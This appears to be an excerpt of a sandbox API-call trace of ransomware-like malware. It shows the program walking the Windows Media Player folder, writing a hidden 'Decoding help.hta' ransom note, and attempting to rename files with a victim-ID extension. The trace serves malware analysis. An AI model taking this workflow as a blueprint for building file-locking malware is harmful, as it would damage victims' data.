[0039.706] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Icons", cAlternateFileName="")) returned 1 [0039.706] lstrcmpW (lpString1=".", lpString2="Icons") returned -1 [0039.706] lstrcmpW (lpString1="..", lpString2="Icons") returned -1 [0039.706] lstrcmpiW (lpString1="windows", lpString2="Icons") returned 1 [0039.707] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.707] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.707] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Icons" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Icons") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Icons" [0039.707] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Icons", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Icons\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Icons\\*.*" [0039.708] GlobalMemoryStatus (in: lpBuffer=0x91cfd10 | out: lpBuffer=0x91cfd10) [0039.708] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109888d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0039.718] CloseHandle (hObject=0x134) returned 1 [0039.719] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80471418, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80471418, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Renderer", cAlternateFileName="MEDIAR~1")) returned 1 [0039.719] lstrcmpW (lpString1=".", lpString2="Media Renderer") returned -1 [0039.719] lstrcmpW (lpString1="..", lpString2="Media Renderer") returned -1 [0039.719] lstrcmpiW (lpString1="windows", lpString2="Media Renderer") returned 1 [0039.720] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.720] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Media Renderer" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer" [0039.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0039.720] GlobalMemoryStatus (in: lpBuffer=0x91cfd10 | out: lpBuffer=0x91cfd10) [0039.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109b89a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0039.730] CloseHandle (hObject=0x134) returned 1 [0039.730] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ba168ab, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x6ba168ab, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x3401fe00, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x47a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mpvis.DLL", cAlternateFileName="")) returned 1 [0039.730] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.730] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.730] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0xffffffff [0039.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0039.730] WriteFile (in: hFile=0x134, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x91cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x91cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.734] CloseHandle (hObject=0x134) returned 1 [0039.734] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.734] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mpvis.DLL") returned -1 [0039.734] lstrlenW (lpString="mpvis.DLL") returned 9 [0039.734] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.734] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.734] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="mpvis.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL" [0039.734] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL" [0039.734] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0039.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL" (normalized: "c:\\program files\\windows media player\\mpvis.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\mpvis.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\mpvis.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.734] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8044b2b8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8044b2b8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Sharing", cAlternateFileName="NETWOR~1")) returned 1 [0039.734] lstrcmpW (lpString1=".", lpString2="Network Sharing") returned -1 [0039.734] lstrcmpW (lpString1="..", lpString2="Network Sharing") returned -1 [0039.734] lstrcmpiW (lpString1="windows", lpString2="Network Sharing") returned 1 [0039.735] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.735] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Network Sharing" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing" [0039.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0039.735] GlobalMemoryStatus (in: lpBuffer=0x91cfd10 | out: lpBuffer=0x91cfd10) [0039.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109d0a08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0039.759] CloseHandle (hObject=0x134) returned 1 [0039.759] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa925159f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa925159f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9277700, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1fb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup_wm.exe", cAlternateFileName="")) returned 1 [0039.759] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.759] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.759] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.759] lstrcmpiW (lpString1="Decoding help.hta", lpString2="setup_wm.exe") returned -1 [0039.759] lstrlenW (lpString="setup_wm.exe") returned 12 [0039.759] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.759] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.759] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="setup_wm.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe" [0039.759] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe" [0039.759] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.759] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe" (normalized: "c:\\program files\\windows media player\\setup_wm.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\setup_wm.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\setup_wm.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.760] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9874cd8b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9874cd8b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skins", cAlternateFileName="")) returned 1 [0039.760] lstrcmpW (lpString1=".", lpString2="Skins") returned -1 [0039.760] lstrcmpW (lpString1="..", lpString2="Skins") returned -1 [0039.760] lstrcmpiW (lpString1="windows", lpString2="Skins") returned 1 [0039.761] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.762] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.762] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Skins" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins" [0039.762] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*" [0039.762] GlobalMemoryStatus (in: lpBuffer=0x91cfd10 | out: lpBuffer=0x91cfd10) [0039.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109e8a70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0039.773] CloseHandle (hObject=0x134) returned 1 [0039.773] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visualizations", cAlternateFileName="VISUAL~1")) returned 1 [0039.773] lstrcmpW (lpString1=".", lpString2="Visualizations") returned -1 [0039.773] lstrcmpW (lpString1="..", lpString2="Visualizations") returned -1 [0039.773] lstrcmpiW (lpString1="windows", lpString2="Visualizations") returned 1 [0039.775] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.775] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Visualizations" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Visualizations") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Visualizations" [0039.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Visualizations", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Visualizations\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Visualizations\\*.*" [0039.775] GlobalMemoryStatus (in: lpBuffer=0x91cfd10 | out: lpBuffer=0x91cfd10) [0039.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a18b40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0039.803] CloseHandle (hObject=0x134) returned 1 [0039.803] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ee55f9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8ee55f9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa8ee55f9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x40400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmlaunch.exe", cAlternateFileName="")) returned 1 [0039.803] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.803] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.803] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.803] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.803] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmlaunch.exe") returned -1 [0039.804] lstrlenW (lpString="wmlaunch.exe") returned 12 [0039.804] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.804] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.804] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="wmlaunch.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe" [0039.804] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe" [0039.804] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe" (normalized: "c:\\program files\\windows media player\\wmlaunch.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmlaunch.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.804] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8f0b759, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8f0b759, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa8f0b759, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpconfig.exe", cAlternateFileName="")) returned 1 [0039.804] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.804] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.804] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.804] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.804] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpconfig.exe") returned -1 [0039.804] lstrlenW (lpString="wmpconfig.exe") returned 13 [0039.804] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.804] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.804] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="wmpconfig.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe" [0039.804] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe" [0039.804] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe" (normalized: "c:\\program files\\windows media player\\wmpconfig.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpconfig.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpconfig.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.804] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0af919e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0af919e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0b1f2fe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x128200, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPDMC.exe", cAlternateFileName="")) returned 1 [0039.805] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.805] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.805] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.805] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.805] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPDMC.exe") returned -1 [0039.805] lstrlenW (lpString="WMPDMC.exe") returned 10 [0039.805] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.805] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.805] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="WMPDMC.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe" [0039.805] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe" [0039.805] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe" (normalized: "c:\\program files\\windows media player\\wmpdmc.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMC.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpdmc.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.805] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b88470, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x52b88470, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x4623b740, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x68200, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPDMCCore.dll", cAlternateFileName="")) returned 1 [0039.805] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.805] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.805] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") 